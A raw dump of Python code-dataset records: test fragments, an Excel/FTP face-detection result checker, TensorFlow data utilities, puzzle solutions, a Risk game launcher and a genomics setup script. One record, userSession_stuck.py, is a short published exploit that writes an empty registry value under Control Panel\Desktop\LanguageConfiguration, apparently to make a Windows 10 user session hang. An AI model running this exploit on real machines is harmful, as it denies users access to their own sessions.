fd1 = make_mock_fd(force=[1, 2, 3], distance=[0, 1, 2], start=0)\n fd2 = make_mock_fd(force=[2, 2, 2], distance=[0, 1, 2], start=100)\n assert np.allclose((fd1 - fd2).f.data, [-1, 0, 1])\n 
assert np.allclose((fd2 - fd1).f.data, [1, 0, -1])\n\n    fd1 = make_mock_fd(force=[1, 2, 3], distance=[0, 1, 2], start=0)\n    fd2 = make_mock_fd(force=[2, 2, 2], distance=[1, 2, 3], start=100)\n    assert np.allclose((fd1 - fd2).f.data, [0, 1])\n    assert np.allclose((fd2 - fd1).f.data, [0, -1])\n\n    fd1 = make_mock_fd(force=[1, 2, 3], distance=[0, 1, 2], start=0)\n    fd2 = make_mock_fd(force=[1, 1, 1], distance=[5, 6, 7], start=100)\n    assert np.allclose((fd1 - fd2).f.data, [])\n    assert np.allclose((fd2 - fd1).f.data, [])\n","sub_path":"04 C-Trap Automation PYTHON/blue-lake_scripting/advanced/lumicks/pylake/tests/test_dfcurve.py","file_name":"test_dfcurve.py","file_ext":"py","file_size_in_byte":1294,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"102984726","text":"import xlsxwriter\r\nimport csv\r\nfrom picCheck.updateFtp import *\r\nimport os\r\n\r\ndef getresult(excelFileAera,endstr,startstr):# read the data from the Excel file\r\n    csv_reader = csv.reader(open(excelFileAera))\r\n    results = []\r\n    start = False\r\n    for i in csv_reader:\r\n        if i[0] == endstr :# position where data reading ends\r\n            break\r\n        if i[0] == startstr: # position where data reading starts\r\n            start = True\r\n            continue\r\n        if start:\r\n            results.append(i)\r\n    return results\r\n\r\nstandardResult = getresult(STANDAR_EXCEL,'程序结束时间','文件名')\r\ncheckResult = getresult(CHECK_EXCEL,'程序结束时间','文件名')\r\n\r\ndef acreage(x1,y1,x3,y3):\r\n    return abs(x1-x3) * abs(y1-y3)\r\ndef centrality(x1,y1,x2,y2):\r\n    c = [x1,x2]\r\n    c.sort()\r\n    d = [y1,y2]\r\n    d.sort()\r\n    centralityRx = c[0]+(c[1]-c[0])/2\r\n    centralityRy = d[0]+(d[1]-d[0])/2\r\n    return centralityRx,centralityRy\r\n# def stance(checkName,x1,y1,x3,y3,x0,y0,x4,y4):\r\n#     rx,ry = centrality(x1,y1,x3,y3)\r\n#     rx0,ry0 = centrality(x0,y0,x4,y4)\r\n#     if rx == rx0 and ry == ry0:\r\n#         return checkName,(x0,y0,x4,y4).__str__(),'正确匹配'\r\n#     if rx == rx0 and abs(ry-ry0) <= 0.1*abs(y3-y1):\r\n#         return checkName,(x0,y0,x4,y4).__str__(),'正确匹配'\r\n#     if ry == ry0 and abs(rx-rx0) <= 0.1*abs(x3-x1):\r\n#         return checkName,(x0,y0,x4,y4).__str__(),'正确匹配'\r\n#     if rx != rx0 and ry != ry0:\r\n#         centrAcreageR = acreage(rx,ry,rx0,ry0)\r\n#         acreageR = acreage(x1,y1,x3,y3)\r\n#\r\n#         if centrAcreageR <=0.1*acreageR:\r\n#             return checkName,(x0,y0,x4,y4).__str__(),'正确匹配'\r\n#         else:\r\n#             return checkName,(x0,y0,x4,y4).__str__(),'误测'\r\n#     elif rx == rx0 and abs(ry-ry0) > 0.1*abs(y3-y1):\r\n#         return checkName,(x0,y0,x4,y4).__str__(),'误测'\r\n#     elif ry == ry0 and abs(rx-rx0) > 0.1*abs(x3-x1):\r\n#         return checkName,(x0,y0,x4,y4).__str__(),'误测'\r\n# new algorithm\r\ndef stance(checkName,x1,y1,x3,y3,x0,y0,x4,y4):\r\n    if x1 == y1 == x3==y3 == 0 and x0 == y0 == x4 == y4 == 0:\r\n        return checkName,(x0,y0,x4,y4).__str__(),'正确匹配'\r\n    # else:\r\n    #     return checkName,(x0,y0,x4,y4).__str__(),'误测'\r\n    newX1 = max(x1,x0)\r\n    newY1 = max(y1,y0)\r\n    newX2 = min(x1+abs(x3-x1),x0+abs(x0-x4))\r\n    newY2 = min(y1+abs(y1-y3),y0+abs(y0-y4))\r\n    print(newX2,newX1,newY2,newY1)\r\n    AJoin = 0\r\n    if newX2>newX1 and newY2 > newY1 :\r\n        AJoin = (newX2-newX1)*(newY2 - newY1)\r\n    A1 = abs(x3-x1) * abs(y1-y3)\r\n    A2 = abs(x0-x4) * abs(y0-y4)\r\n    AUnion = A1+A2-AJoin\r\n    if AUnion > 0 or AUnion == 0 :\r\n        if AJoin/A1 > 0.9 or AJoin/A1 == 0.9 :\r\n            return checkName,(x0,y0,x4,y4).__str__(),'正确匹配'\r\n        else:\r\n            return checkName,(x0,y0,x4,y4).__str__(),'误测'\r\n    else:\r\n        return checkName,(x0,y0,x4,y4).__str__(),'误测'\r\n    # print('AJoin',AJoin)\r\n\r\ndef checkFaceNum(results):\r\n    newResult = []\r\n    for result in results:\r\n        
newResult.append(result[0])\r\n    dic ={}\r\n    for item in newResult:\r\n        if item in dic.keys():\r\n            dic[item]+=1\r\n        else:\r\n            dic[item]=1\r\n    return dic\r\n\r\ndef checkMain():\r\n    results1 = []\r\n    results2 = []\r\n    results3 = []\r\n    results4 = []\r\n    wrongResult = []\r\n    standardDic = checkFaceNum(standardResult)\r\n    checkDic = checkFaceNum(checkResult)\r\n\r\n    for i in checkDic :\r\n        for j in standardDic:\r\n            if j in checkDic:\r\n                if i == j:\r\n                    if checkDic[i] == standardDic[j]:\r\n                        print(i, standardDic[i], \":the same\")\r\n                    elif checkDic[i] < standardDic[j]:\r\n                        # for j in checkResult:\r\n                        #     if i == j[0]:\r\n                        res1 = [j,'比对表,标准表数量少'+str(standardDic[j] - checkDic[i] )]\r\n                        results3.append(res1)\r\n                    elif checkDic[i] > standardDic[j]:\r\n                        # for j in checkResult:\r\n                        #     if i == j[0]:\r\n                        res1 = [j,'标准表,比对表数量少'+str(checkDic[i] - standardDic[j])]\r\n                        results3.append(res1)\r\n            else:\r\n                break\r\n    for j1 in standardDic:\r\n        if j1 not in checkDic:\r\n            # for j in standardResult:\r\n            #     if j1 == j[0]:\r\n            res1 = [j1,'在标准表存在'+j1+'数量:'+str(standardDic[j1])+'在比对表中不存在']\r\n            results3.append(res1)\r\n\r\n\r\n    # dif = set(checkDic.items())^set(standardDic.items())\r\n    # print('dif:',list(dif))\r\n    # for result1111 in checkResult:\r\n    #     if '/tmp/banchun/pic/dahua/000308600.jpg' == result1111[0]:\r\n    #         # print(result[0],key[0])\r\n    #         print('1111:',result1111)\r\n    # i = 4\r\n    # for i in range(4):\r\n    #     resyRrry = []\r\n    #     for result in checkResult:\r\n    #         for key in dif:\r\n    #             key1 = key[0]\r\n    #             break\r\n    #\r\n    #     print('key1',key1)\r\n    # for i in range(len(checkResult)):\r\n    #     for key in dif:\r\n    #         for result in checkResult:\r\n    #             if result[0] == key[0]:\r\n    #                 print(result[0],key[0])\r\n    #                 print(result)\r\n    #                 try:\r\n    #                     checkResult.remove(result)\r\n    #                 except Exception as e :\r\n    #                     pass\r\n    #                 import time\r\n    #                 time.sleep(1)\r\n    #     i=i-1\r\n    print('11112:',checkResult)\r\n    for i in standardResult:\r\n        for j in checkResult:\r\n            if i[0] == j[0]:\r\n                print(i[0])\r\n                picName,coordinate,res = stance(i[0],int(i[1]),int(i[2]),int(i[3]),int(i[4]),int(j[1]),int(j[2]),int(j[3]),int(j[4]))\r\n                if res == '正确匹配':\r\n                    results1.append([picName,coordinate,res])\r\n                else:\r\n                    results2.append([picName,coordinate,res])\r\n    for i in results1:\r\n        for j in results2:\r\n            if i[0] == j[0] and i[1] == j[1]:\r\n                results2.remove(j)\r\n    # a= []\r\n    results2 = list(set([tuple(x) for x in results2]))\r\n    for i in results2:\r\n        i = list(i)\r\n        wrongResult.append(i)\r\n    print(results1)\r\n    print(wrongResult)\r\n    print(results3)\r\n    print(len(results1))\r\n    print(len(wrongResult))\r\n    print(len(results3))\r\n    wrong1 = len(wrongResult)/len(standardResult)*100\r\n    wrong2 = len(wrongResult)/len(checkResult)*100\r\n    true = len(results1)/len(standardResult)*100\r\n    true1 = len(results1)/len(checkResult)*100\r\n    leave = len(results3)/len(standardResult)*100\r\n    leave1 = len(results3)/len(checkResult)*100\r\n    results4 = results1+wrongResult\r\n    return results4,results3,[['正确/标准表:',str('%.2f'%true)+'%'],['正确/比对表:',str('%.2f'%true1)+'%'],['漏测/标准表:',str('%.2f'%leave)],['漏测/比对表:',str('%.2f'%leave1)],['误测/标准表:',str('%.2f'%wrong1)+'%'],['误测/比对表:',str('%.2f'%wrong2)]],wrongResult\r\ndef write_result(workbook, sheet, results_prcessed, result_title, format_title, fromat_content):\r\n    ncols = len(result_title)  # total number of columns\r\n    nrows = len(results_prcessed)+1 # total number of rows, plus one for the header\r\n    for row in range(nrows):\r\n        for col in range(ncols):\r\n            if row == 0:\r\n                sheet.write(row, col, result_title[col], format_title)  # write the header\r\n            elif col == 0:\r\n                sheet.write(row, col, row, 
fromat_content) # write the row number\r\n            else:\r\n                sheet.write(row, col, results_prcessed[row-1][col-1], fromat_content)\r\n\r\ndef write_excel():\r\n    results,results1,results2,wrongResult = checkMain()\r\n    if os.path.exists(OUTEXCEL):\r\n        print ('输出文件已存在!')\r\n        return\r\n    else:\r\n        workbook = xlsxwriter.Workbook(OUTEXCEL)\r\n        sheet1 = workbook.add_worksheet('结果详情')\r\n        sheet2 = workbook.add_worksheet('漏测详情')\r\n        sheet3 = workbook.add_worksheet('概率统计')\r\n        result_title = ['序号','图片地址','人脸坐标','比对结果'] # header row\r\n        result_title1 = ['序号','图片地址','比对结果'] # header row\r\n        result_title2 = ['序号','描述','所有概率'] # header row\r\n        format_title = workbook.add_format({'bold': True, 'bg_color': 'yellow', 'border': True}) # header format\r\n        fromat_content = workbook.add_format({'border': True}) # content format\r\n        write_result(workbook, sheet1, results, result_title, format_title,0)\r\n        write_result(workbook, sheet2, results1, result_title1, format_title,0)\r\n        write_result(workbook, sheet3, results2, result_title2, format_title,0)\r\n        import time\r\n        time = time.strftime(\"%Y%m%d%H%M%S\", time.localtime())\r\n        os.mkdir('statistics/'+time)\r\n        os.mkdir('statistics/'+time+'/leavingOut')\r\n        os.mkdir('statistics/'+time+'/wrongeOut')\r\n        for pname in wrongResult:\r\n            print('pname',pname)\r\n            pname1 = pname[0].split('/')\r\n            pname1 = pname1[len(pname1)-1]\r\n            sftp_down_file(pname[0],'statistics/'+time+'/wrongeOut/'+pname1)\r\n        for pname in results1:\r\n            print('pname',pname)\r\n            pname1 = pname[0].split('/')\r\n            pname1 = pname1[len(pname1)-1]\r\n            sftp_down_file(pname[0],'statistics/'+time+'/leavingOut/'+pname1)\r\n        ftp = updateFtp(HOSTIP)\r\n        ftp.Login(LOGINNAME,LOGINPWD)\r\n\r\n\r\n        ftp.UpLoadFileTree('statistics', REMOTEDIR )\r\n        ftp.close()\r\n        print(\"ok!\")\r\n\r\nwrite_excel()\r\n\r\n\r\n\r\n\r\n\r\n","sub_path":"picCheck/readExcel.py","file_name":"readExcel.py","file_ext":"py","file_size_in_byte":9698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"537327614","text":"# Copyright 2016 The TensorFlow Authors. 
All Rights Reserved.\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n# ==============================================================================\n\"\"\"Contains utilities for downloading and converting datasets.\"\"\"\nfrom __future__ import absolute_import\nfrom __future__ import division\nfrom __future__ import print_function\n\nimport numpy as np\nimport tensorflow as tf\nimport pickle\nimport os\n\n\ndef save_obj(obj, save_dir, name):\n    with open(os.path.join(save_dir, name + '.pkl'), 'wb') as f:\n        pickle.dump(obj, f, pickle.HIGHEST_PROTOCOL)\n\n\ndef load_obj(name, file_dir):\n    with open(os.path.join(file_dir, name + '.pkl'), 'rb') as f:\n        return pickle.load(f)\n\n\ndef int64_feature(values):\n    \"\"\"Returns a TF-Feature of int64s.\n    Args:\n        values: A scalar or list of values.\n    Returns:\n        a TF-Feature.\n    \"\"\"\n    if not isinstance(values, (tuple, list)):\n        values = [values]\n\n    return tf.train.Feature(int64_list=tf.train.Int64List(value=values))\n\n\ndef floats_feature(value):\n    return tf.train.Feature(float_list=tf.train.FloatList(value=value))\n\n\ndef bytes_feature(values):\n    \"\"\"Returns a TF-Feature of bytes.\n    Args:\n        values: A string.\n    Returns:\n        a TF-Feature.\n    \"\"\"\n    return tf.train.Feature(bytes_list=tf.train.BytesList(value=[values]))\n\n\ndef to_tfexample(image_data, image_format, im_size, bbox, azimuth, elevation, theta):\n    return tf.train.Example(features=tf.train.Features(feature={\n        'image/encoded': bytes_feature(image_data),\n        'image/format': bytes_feature(image_format),\n        'image/height': int64_feature(im_size[0]),\n        'image/width': int64_feature(im_size[1]),\n        'image/bbox': floats_feature(bbox),\n        'image/viewpoint': floats_feature([azimuth, elevation, theta]),\n    }))\n\n\ndef image_to_tfexample(image_data, image_format, height, width, class_id):\n    return tf.train.Example(features=tf.train.Features(feature={\n        'image/encoded': bytes_feature(image_data),\n        'image/format': bytes_feature(image_format),\n        'image/class/label': int64_feature(class_id),\n        'image/height': int64_feature(height),\n        'image/width': int64_feature(width),\n    }))\n\n\nclass ImageCoder(object):\n    \"\"\"Helper class that provides TensorFlow image coding utilities.\"\"\"\n\n    def __init__(self):\n        # Create a single Session to run all image coding calls.\n        self._sess = tf.Session()\n\n        # Initializes function that converts PNG to JPEG data.\n        self._png_data = tf.placeholder(dtype=tf.string)\n        image = tf.image.decode_png(self._png_data, channels=3)\n        self._png_to_jpeg = tf.image.encode_jpeg(image, format='rgb', quality=100)\n\n        # Initializes function that converts CMYK JPEG data to RGB JPEG data.\n        self._cmyk_data = tf.placeholder(dtype=tf.string)\n        image = tf.image.decode_jpeg(self._cmyk_data, channels=0)\n        self._cmyk_to_rgb = tf.image.encode_jpeg(image, format='rgb', quality=100)\n\n        # Initializes function that decodes RGB JPEG data.\n        self._decode_jpeg_data = tf.placeholder(dtype=tf.string)\n        self._decode_jpeg = tf.image.decode_jpeg(self._decode_jpeg_data, channels=3)\n\n        # Initializes function 
that encodes RGB JPEG data.\n        self._encode_image_data = tf.placeholder(dtype=tf.uint8)\n        self._encode_jpeg = tf.image.encode_jpeg(self._encode_image_data)\n\n    def png_to_jpeg(self, image_data):\n        return self._sess.run(self._png_to_jpeg,\n                              feed_dict={self._png_data: image_data})\n\n    def cmyk_to_rgb(self, image_data):\n        return self._sess.run(self._cmyk_to_rgb,\n                              feed_dict={self._cmyk_data: image_data})\n\n    def decode_jpeg(self, image_data):\n        image = self._sess.run(self._decode_jpeg,\n                               feed_dict={self._decode_jpeg_data: image_data})\n        assert len(image.shape) == 3\n        assert image.shape[2] == 3\n        return image\n\n    def encode_jpeg(self, image_data):\n        image_data = image_data.astype(dtype=np.uint8)\n        image = self._sess.run(self._encode_jpeg,\n                               feed_dict={self._encode_image_data: image_data})\n        return image\n","sub_path":"datasets/dataset_utils.py","file_name":"dataset_utils.py","file_ext":"py","file_size_in_byte":4737,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"289716743","text":"TEST_NAME = 'B-large'\n\ndef main():\n\tsolutions = []\n\twith open(TEST_NAME+'.in', 'r') as f:\n\t\trows = int(f.readline())\n\t\tfor i in range(rows):\n\t\t\tall_heights = [0 for i in range(2501)]\n\t\t\tN = int(f.readline().strip())\n\t\t\t\n\t\t\tfor j in range(2*N-1):\n\t\t\t\trow = (map(int, f.readline().strip().split(' ')))\n\t\t\t\tfor number in row:\n\t\t\t\t\tall_heights[number] += 1\n\n\t\t\tsolution = get_odd_heights(all_heights)\n\t\t\t\n\t\t\tsolutions.append(' '.join((map(str, solution))))\n\t\n\twith open(TEST_NAME+'.out', 'w') as f:\n\t\tcounter = 1\n\t\tfor line in solutions:\n\t\t\tf.write(\"Case #{0}: {1}\\n\".format(str(counter), line))\n\t\t\tcounter += 1\n\ndef get_odd_heights(all_heights):\n\tres = []\n\tcounter = 0\n\tfor i in all_heights:\n\t\tif i % 2 != 0:\n\t\t\tres = insert_sorted(counter, res)\n\t\tcounter += 1\n\treturn res\n\t\ndef insert_sorted(x, niz):\n\tres = []\n\tcounter = 0\n\tfor i in niz:\n\t\tif i < x:\n\t\t\tcounter += 1\n\t\telse:\n\t\t\tbreak\n\tres = niz[:counter] + [x] + niz[counter:]\n\treturn res\n\nmain()\n\n","sub_path":"codes/BuildLinks1.10/test_input/CJ/16_1_2_crollywood_main.py","file_name":"16_1_2_crollywood_main.py","file_ext":"py","file_size_in_byte":946,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"636328264","text":"import json\n\nfrom flask import Blueprint, render_template, request, redirect\n\nbp = Blueprint(__name__, __name__, template_folder='templates')\n\n\ndef productInfo():\n    # load the product catalogue and return the entry for this product\n    with open('frontEnd/notes/productInfoJson.json', 'r') as _file:\n        jsonData = json.loads(_file.read())\n    product = jsonData[\"GTX 1080TiDUKE11G OC\"]\n    return product\n\n\n\n@bp.route('/product', methods=['POST', 'GET'])\ndef show():\n    return render_template('product.html', notes=productInfo())","sub_path":"src/main/python/frontEnd/views/product.py","file_name":"product.py","file_ext":"py","file_size_in_byte":464,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"508328615","text":"#!/usr/bin/env python2\n# std\nimport argparse\nimport sys\n# user\nimport risk\nimport risk.logger\nimport risk.game_master\nfrom risk import board\nfrom risk.game_master import GameMaster\n\n# exit codes\n_EXIT_BAD_ARGS = -1\n\n###############################################################################\n## CLI option parsing\n#\ndef app_setup():\n    parser = argparse.ArgumentParser(description='Risk game with Python')\n    # dev build defaults 
to debug for now\n    parser.add_argument('--verbose', '-v', action='count',\n        help='extra output', default=risk.logger.LEVEL_DEBUG)\n    settings = parser.parse_args()\n    risk.logger.LOG_LEVEL = settings.verbose\n    return settings\n\n\n###############################################################################\n## Debug functions\n#\ndef end_turn_debug_print(game_master):\n    risk.logger.debug('Ending turn...')\n\n###############################################################################\n## Main game functions\n#\ndef game_setup(settings):\n    _DEV_HUMAN_PLAYERS = 6\n    game_board = board.generate_empty_board()\n    game_master = risk.game_master.GameMaster(game_board, settings)\n    game_master.generate_human_players(_DEV_HUMAN_PLAYERS)\n    game_master.add_end_turn_callback(end_turn_debug_print)\n    return game_master\n\ndef run_game(game_master):\n    risk.logger.debug('Starting risk game...')\n    game_master.choose_territories()\n    player = 0\n    while not game_master.ended:\n        game_master.player_take_turn(player)\n        game_master.call_end_turn_callbacks()\n        player = (player + 1) % game_master.number_of_players()\n    risk.logger.debug('User quit the game!') \n\nif __name__ == '__main__':\n    settings = app_setup()\n    risk.logger.debug(settings)\n    master = game_setup(settings)\n    run_game(master)\n","sub_path":"risk.py","file_name":"risk.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"167491233","text":"'''\n1071 : [Basics - loop structures] Print repeatedly until 0 is entered 1 (explanation)\nIntegers are entered in sequence.\n-2147483648 ~ +2147483647; the number of inputs is unknown.\n\nIf a value is not 0, print the entered integer; once a 0 is entered, stop printing.\nLoop constructs such as while( ), for( ), do~while( ) may not be used.\n'''\nlist = input().split()\n\nfor x in list:\n    if(int(x)==0):\n        break\n    else:\n        print(int(x))\n","sub_path":"codeUp/codeUp100/1071.py","file_name":"1071.py","file_ext":"py","file_size_in_byte":460,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"484458086","text":"#This example implements a 5 invader SDMI game with a Brute force Capture order\r\nimport sdmiFuncLib as sfl\r\nimport numpy as np\r\nimport matplotlib.pyplot as plt\r\n\r\n\r\n#Invader Locations\r\n\r\n#I0 => [-12.25709932   4.44973388]\r\n#I1 => [ -6.6489077   21.23919568]\r\n#I2 => [  0.41996017  24.16072049]\r\n#I3 => [  8.51769598  11.40288417]\r\n\r\nI_array = [[-12.25709932, 4.44973388],\r\n           [ -6.6489077, 21.23919568],\r\n           [ 0.41996017, 24.16072049],\r\n           [ 8.51769598, 11.40288417],\r\n           [ -6.6489077, 24.16072049]]\r\n\r\n## Game Properties\r\n\r\nr =0 #Capture range\r\nalpha = 4 #Speed ratio\r\nDefender = [0,0] #Defender Position\r\nG_circ = [0, -8, 8] #Target Region Properties\r\n\r\n## Compute Capture order With Enumeration\r\nbestOrder,_,meanVect, StdData,_ = sfl.computeBestOrderEnum(I_array, r, alpha, Defender, G_circ,eMethod=0)\r\nprint(\"Capture Order: \", bestOrder)\r\nprint(\"Number of Computations\", sfl.NumeralCounter)\r\nI_dict,_ = sfl.createInvDict(I_array)\r\n\r\n## Plot Trial\r\nfig, axs = plt.subplots()\r\nTotEff, P_star, T = sfl.plotTrial(Defender, I_dict, bestOrder, G_circ, alpha, r, axisSz=[-10,10,-5,10], plotFlag=1, T = 0, effMethod = 0, plt=axs)\r\n\r\nFL_score = sfl.flightPathScore(P_star, Defender)\r\nNumInTarget_score = sfl.numInTarget(P_star, G_circ, bestOrder, I_dict)\r\n\r\nprint('Efficiency Score: ', TotEff)\r\nprint('Flight Path Score: ', FL_score)\r\nprint('Number of Invaders Captured: ', len(I_array ) - NumInTarget_score)\r\n\r\naxs.set_aspect('equal', 
adjustable='datalim')\r\nplt.show()\r\n","sub_path":"Examples/plot_SDMI_Enumeration_Order_Example.py","file_name":"plot_SDMI_Enumeration_Order_Example.py","file_ext":"py","file_size_in_byte":1514,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"383229491","text":"#!python3\r\n# 2013-Jan-21 Mon 07:15\r\nimport turtle, random, time\r\n\r\ndef turtle_cubic_bezier(p0,p1,p2,p3, n=1000*50):\r\n\r\n    x0, y0 = p0[0], p0[1]\r\n    x1, y1 = p1[0], p1[1]\r\n    x2, y2 = p2[0], p2[1]\r\n    x3, y3 = p3[0], p3[1]\r\n    turtle.penup()\r\n    turtle.goto(x0,y0)\r\n    turtle.pendown()\r\n    for i in range(n+1):\r\n        t = i / n\r\n        a = (1. - t)**3\r\n        b = 3. * t * (1. - t)**2\r\n        c = 3.0 * t**2 * (1.0 - t)\r\n        d = t**3\r\n        \r\n        x = int(a * x0 + b * x1 + c * x2 + d * x3)\r\n        y = int(a * y0 + b * y1 + c * y2 + d * y3)\r\n        turtle.goto(x,y)\r\n    turtle.goto(x3,y3)\r\n\r\ndef r01(): return random.random()\r\ndef r(): return int(r01()*200-100)\r\ndef rr(): return(r(),r())\r\ndef rmid(x1,x2): return int(x1+x2+r()/2)/2\r\n\r\ndef add_point(x, y):\r\n    try:\r\n        add_point.new_points.append([x,y])\r\n    except AttributeError:\r\n        add_point.new_points = [[x,y]]\r\n    print(add_point.new_points)\r\n    print(\"Mouse click\")\r\n    if len(add_point.new_points) >= 4:\r\n        turtle_cubic_bezier(*add_point.new_points)\r\n        add_point.new_points = []\r\n\r\ndef clearScreen(x ,y):\r\n    print(\"please clear\")\r\n    turtle.getscreen().clear()\r\n\r\n\r\n\r\n\r\ndef random_color():\r\n    def t(i): return time.clock() * i % 1\r\n    rbg = [t(1), t(3), t(5)]\r\n    print(\"rbg=(%3.2f,%3.2f,%3.2f)\" % (rbg[0],rbg[1],rbg[2]))\r\n    turtle.color(*rbg)\r\n\r\ndef main():\r\n    #turtle.ht()\r\n\r\n    turtle.speed(0)\r\n    turtle.delay(0)\r\n    turtle.colormode(1.)\r\n\r\n    turtle.onscreenclick(add_point)\r\n    turtle.onscreenclick(clearScreen, btn=2)\r\n    turtle.done()\r\n\r\n    \r\n    \r\nif __name__ == \"__main__\":\r\n    main()    ","sub_path":"turtle/bezier.py","file_name":"bezier.py","file_ext":"py","file_size_in_byte":1615,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"606050728","text":"# def divison(x,y):\n#     try:\n#         print (x/y)\n#     except Exception :\n#         print (f'exception occured {Exception}')\n#     finally:\n#         print('end')\n\n# divison(10,0)\n\nprint('some data')\ndef list_enumerate(list):\n    for i, val in enumerate(list):\n        print(f'index : {i} and value : {val}')\n\nlist_enumerate([2,4,6,8])\n","sub_path":"ExceptionHandling/Try.py","file_name":"Try.py","file_ext":"py","file_size_in_byte":340,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"}
{"seq_id":"5716274","text":"#!/usr/bin/env python\n#\n# Exploit Title: Windows 10 User Session Stuck\n# Date: 2018-10-19\n# Exploit Author: Fabien DROMAS - Security consultant @ Synetis \n# Twitter: st0rnpentest\n#\n# Vendor Homepage: www.microsoft.com\n# Version: Version 10.0.17134.345\n# Tested on: Windows 10 pro Version 10.0.17134.345\n#\nimport _winreg\n\n\ndef modify_reg_key(key, value):\n    try: \n        registry_key = _winreg.OpenKey(_winreg.HKEY_CURRENT_USER, 'Control Panel\\Desktop\\LanguageConfiguration', 0, _winreg.KEY_WRITE) \n        _winreg.SetValueEx(registry_key, key, 0, _winreg.REG_SZ, value) \n        _winreg.CloseKey(registry_key)\n    except WindowsError: \n        raise\n    \n\nif __name__ == '__main__':\n\n    try:\n        modify_reg_key('', '') \n    except WindowsError:\n        raise 
\n","sub_path":"userSession_stuck.py","file_name":"userSession_stuck.py","file_ext":"py","file_size_in_byte":844,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"58"} +{"seq_id":"275599071","text":"\n\"\"\"Enumerating the subtypes of a gene in a cohort to be isolated.\n\n\"\"\"\n\nimport os\nbase_dir = os.path.dirname(__file__)\n\nimport sys\nsys.path.extend([os.path.join(base_dir, '../../..')])\n\nfrom HetMan.features.cohorts.tcga import MutationCohort\nimport argparse\nimport synapseclient\nimport dill as pickle\n\nfirehose_dir = \"/home/exacloud/lustre1/share_your_data_here/precepts/firehose\"\n\n\ndef main():\n parser = argparse.ArgumentParser(\n \"Set up the gene subtype expression effect isolation experiment by \"\n \"enumerating the subtypes to be tested.\"\n )\n\n # create positional command line arguments\n parser.add_argument('cohort', type=str, help=\"which TCGA cohort to use\")\n parser.add_argument('gene', type=str, help=\"which gene to consider\")\n parser.add_argument('mut_levels', type=str,\n help=\"the mutation property levels to consider\")\n\n # create optional command line arguments\n parser.add_argument('--samp_cutoff', type=int, default=20,\n help='subtype sample frequency threshold')\n parser.add_argument('--verbose', '-v', action='store_true',\n help='turns on diagnostic messages')\n\n # parse command line arguments, create directory where found subtypes\n # will be stored\n args = parser.parse_args()\n use_lvls = args.mut_levels.split('__')\n out_path = os.path.join(base_dir, 'setup', args.cohort, args.gene)\n os.makedirs(out_path, exist_ok=True)\n\n # log into Synapse using locally stored credentials\n syn = synapseclient.Synapse()\n syn.cache.cache_root_dir = (\"/home/exacloud/lustre1/CompBio/\"\n \"mgrzad/input-data/synapse\")\n syn.login()\n\n # load expression and variant call data for the given TCGA cohort\n cdata = MutationCohort(\n cohort=args.cohort, mut_genes=[args.gene], mut_levels=use_lvls,\n expr_source='Firehose', var_source='mc3', expr_dir=firehose_dir,\n cv_prop=1.0, syn=syn\n )\n\n if args.verbose:\n print(\"Looking for combinations of subtypes of mutations in gene {} \"\n \"present in at least {} of the samples in TCGA cohort {} at \"\n \"annotation levels {}.\\n\".format(\n args.gene, args.samp_cutoff, args.cohort, use_lvls)\n )\n\n # find mutation subtypes present in enough samples in the TCGA cohort\n iso_mtypes = cdata.train_mut.find_unique_subtypes(\n max_types=1000, max_combs=5, verbose=2,\n sub_levels=use_lvls, min_type_size=args.samp_cutoff\n )\n\n # filter out the subtypes that appear in too many samples for there to\n # be a wild-type class of sufficient size for classification\n use_mtypes = {mtype for mtype in iso_mtypes\n if (len(mtype.get_samples(cdata.train_mut))\n <= (len(cdata.samples) - args.samp_cutoff))}\n\n if args.verbose:\n print(\"\\nFound {} total sub-types to isolate!\".format(\n len(use_mtypes)))\n\n # save the list of found non-duplicate subtypes to file\n pickle.dump(\n sorted(use_mtypes),\n open(os.path.join(out_path,\n 'mtypes_list__samps_{}__levels_{}.p'.format(\n args.samp_cutoff, args.mut_levels)),\n 'wb')\n )\n\n # save the number of found subtypes to file\n with open(os.path.join(out_path,\n 'mtypes_count__samps_{}__levels_{}.txt'.format(\n args.samp_cutoff, args.mut_levels)),\n 'w') as fl:\n\n fl.write(str(len(use_mtypes)))\n\n\nif __name__ == '__main__':\n 
